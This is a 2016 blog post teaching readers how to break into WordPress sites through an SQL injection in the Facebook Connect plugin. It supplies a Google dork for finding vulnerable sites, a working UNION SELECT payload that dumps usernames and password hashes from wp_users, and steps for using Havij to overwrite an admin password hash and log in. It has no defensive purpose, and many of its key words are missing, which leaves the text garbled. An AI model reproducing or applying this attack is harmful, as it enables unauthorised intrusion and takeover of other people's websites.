Thursday, May 26, 2016

How to WordPress websites | SQLi vulnerability &


Many people use the Facebook Connect WordPress plugin on their blogs. They think it's cool, but it could be a big security hole. Here's the way to these sites.

Step 1: http://www.google.com

Step 2: Now enter this dork to find sites with the security hole.

inurl:"fbconnect_action=myhome"

Step 3: You will find many sites. Select the site which you are comfortable with.

You will find something like that.

Step 4: Now replace
?fbconnect_action=myhome&userid=
with this
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,con(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--
Step 5: Now you have the user name and .

Step 6: The is encrypted with WordPress md5 (blowfish). You need to de this.

Step 7: Then find the administrator panel out. Normally it should be in
www.victrite.com/wp-admin or
www.victrite.com/wp-login.p






Note: Decoding this type of may take a long time.

So here is another way to the .....


Step 1: Open Havij and paste the blog URL you are going to ..

Example:
http://www.victrite.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,con%28user_login,0x3a,user_pass%29z0mbyak,7,8,9,10,11,12+from+wp_users--
Step 2: Now find Databases, Tables.

Step 3: Select wp-users, then tick all columns. Then click on Get Data.

Step 4: You will find something like that.



Step 5: Now select any user and change the user_pass to
$P$BbCzkVXQ6r.T8znShDPMSzM7Whhubc/
Step 6: Now login with the intruths .




credits to: Devilscafe.in
